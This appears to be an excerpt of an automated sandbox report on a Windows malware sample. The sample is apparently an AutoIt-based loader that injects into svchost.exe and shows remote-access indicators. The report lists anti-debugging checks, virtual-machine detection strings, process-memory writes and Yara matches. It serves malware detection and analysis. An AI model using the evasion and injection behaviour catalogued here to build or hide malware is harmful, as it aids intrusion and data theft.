              Source: C:\Windows\SysWOW64\svchost.exe TID: 4956 Thread sleep count: 1996 > 30
              Source: C:\Windows\SysWOW64\svchost.exe TID: 4956 Thread sleep time: -5988000s >= -30000s
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7080 Thread sleep time: -510000s >= -30000s
              Source: C:\Windows\SysWOW64\svchost.exe TID: 4956 Thread sleep count: 6864 > 30
              Source: C:\Windows\SysWOW64\svchost.exe TID: 4956 Thread sleep time: -20592000s >= -30000s
              Source: C:\Windows\System32\alg.exe TID: 5780 Thread sleep time: -150000s >= -30000s
              Source: C:\Windows\System32\alg.exe TID: 7028 Thread sleep time: -60000s >= -30000s
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe TID: 7492 Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\System32\msdtc.exe TID: 7720 Thread sleep count: 488 > 30
              Source: C:\Windows\System32\msdtc.exe TID: 7720 Thread sleep time: -48800s >= -30000s
              Source: C:\Windows\System32\msdtc.exe TID: 7692 Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe TID: 7912 Thread sleep time: -60000s >= -30000s
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Code function: 0_2_0045DE8F FindFirstFileW,FindClose
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 1_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 1_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 1_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 1_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 1_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 1_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 1_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 1_2_0045DE8F FindFirstFileW,FindClose
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 1_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 3_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 3_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 3_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 3_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 3_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 3_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 3_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 3_2_0045DE8F FindFirstFileW,FindClose
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 3_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary
              Source: C:\Windows\System32\alg.exe Thread delayed: delay time: 60000
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Thread delayed: delay time: 60000
              Source: C:\Windows\System32\msdtc.exe Thread delayed: delay time: 60000
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Thread delayed: delay time: 60000
              Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Documents and Settings\user\AppData\Local\
              Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\
              Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
              Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Documents and Settings\user\AppData\Local\Adobe\
              Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\
              Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Cache\
              Source: Spectrum.exe, 0000001E.00000003.2022230753.00000000005F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: Spectrum.exe, 0000001E.00000003.2022230753.00000000005F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
              Source: Spectrum.exe, 0000001E.00000003.2022230753.00000000005F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: alg.exe, 00000008.00000003.2431200193.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1942758358.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1935362929.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2644014392.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2250815667.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2458126956.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2293661873.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1971647597.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1957305293.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1890190874.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2314296251.0000000000573000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Spectrum.exe, 0000001E.00000003.2022230753.00000000005F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
              Source: Spectrum.exe, 0000001E.00000003.2022230753.00000000005F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00l
              Source: Spectrum.exe, 0000001E.00000003.2022230753.00000000005F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe API call chain: ExitProcess graph end node graph_0-65874
              Source: C:\Users\user\AppData\Local\directory\name.exe API call chain: ExitProcess graph end node graph_1-84818
              Source: C:\Users\user\AppData\Local\directory\name.exe API call chain: ExitProcess graph end node
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Code function: 0_2_0045A370 BlockInput
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Code function: 0_2_0493B288 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Code function: 0_2_0493B2E8 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Code function: 0_2_04939C38 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 1_2_04C104C8 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 1_2_04C10528 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 1_2_04C0EE78 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 3_2_04CE6570 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 3_2_04CE6510 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 3_2_04CE4EC0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 5_2_04CD94D0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 5_2_04CD7E80 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 5_2_04CD9530 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 18_2_04C17558 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 18_2_04C174F8 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 18_2_04C15EA8 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeProcess token adjusted: Debug
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0041F250 SetUnhandledExceptionFilter,1_2_0041F250
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0041A208
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00417DAA
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0041F250 SetUnhandledExceptionFilter,3_2_0041F250
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041A208
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00417DAA

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtQuerySystemInformation: Indirect: 0x9B8462
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtOpenKeyEx: Indirect: 0x140077B9B
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtQueryValueKey: Indirect: 0x140077C9F
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtClose: Indirect: 0x140077E81
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeNtQuerySystemInformation: Indirect: 0xB98462
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtAdjustPrivilegesToken: Indirect: 0x9B864C
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeNtAdjustPrivilegesToken: Indirect: 0xB9864C
              Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\directory\name.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: AEF008
              Source: C:\Users\user\AppData\Local\directory\name.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 3EB008
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
              Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\tyRPPK48Mk.exe"
              Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
              Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
              Source: name.exeBinary or memory string: Shell_TrayWnd
              Source: tyRPPK48Mk.exe, 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp, tyRPPK48Mk.exe, 00000000.00000000.1770251172.0000000000482000.00000002.00000001.01000000.00000003.sdmp, tyRPPK48Mk.exe, 00000000.00000003.1783849025.00000000058B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
              Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\alg.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTDA9F.tmp VolumeInformation
              Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTDAAF.tmp VolumeInformation
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\msdtc.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\Locator.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\SensorDataService.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\snmptrap.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\Spectrum.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\TieringEngineService.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\AgentService.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\vds.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\wbengine.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\TieringEngineService.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_00472C3F GetUserNameW,1_2_00472C3F
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara matchFile source: 1.2.name.exe.3c50000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.name.exe.3d80000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.name.exe.39b0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.name.exe.3d80000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.name.exe.3c50000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.name.exe.39b0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.1959006729.0000000000822000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 4420, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 2084, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 6908, type: MEMORYSTR
              Source: name.exeBinary or memory string: WIN_XP
              Source: name.exe, 00000005.00000002.1842744135.0000000000482000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
              Source: name.exeBinary or memory string: WIN_XPe
              Source: name.exeBinary or memory string: WIN_VISTA
              Source: name.exeBinary or memory string: WIN_7
              Source: name.exeBinary or memory string: WIN_8

              Remote Access Functionality

              Source: C:\Windows\SysWOW64\svchost.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-98KSNN
              Source: C:\Windows\SysWOW64\svchost.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-98KSNN
              Source: Yara matchFile source: 1.2.name.exe.3c50000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.name.exe.3d80000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.name.exe.39b0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.name.exe.3d80000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.name.exe.3c50000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.name.exe.39b0000.1.unpack, type: UNPACKEDPE
